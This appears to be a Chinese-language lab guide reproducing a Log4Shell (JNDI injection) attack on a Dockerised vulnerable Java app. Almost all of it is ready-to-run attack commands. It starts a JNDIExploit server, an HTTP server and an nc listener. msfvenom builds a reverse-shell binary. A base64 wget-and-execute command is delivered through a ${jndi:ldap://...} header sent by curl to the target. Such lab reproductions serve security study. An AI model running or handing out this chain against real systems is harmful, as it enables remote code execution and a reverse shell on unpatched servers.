被攻击机ip:47.47.47.47
攻击机ip:48.48.48.48
- 使用DockerFile build docker镜像运行:
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln
- 使用DockerFile build docker镜像运行
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack
攻击机环境准备
三个不同shell中执行命令,需要保证shell活跃
- 攻击机启动JDNI服务器
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
- 攻击机启动http服务器
docker exec -it attack /bin/bash
python3 -m http.server 9999
- 攻击机nc监听端口
docker exec -it attack /bin/bash
nc -lvvp 9000
攻击机实现攻击
同一shell中执行命令
docker exec -it attack /bin/bash
- 攻击机准备反弹shell文件
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
- 攻击机准备payload
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
- 发送攻击payload
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'
python3 command_gen.py vuln_ip attack_ip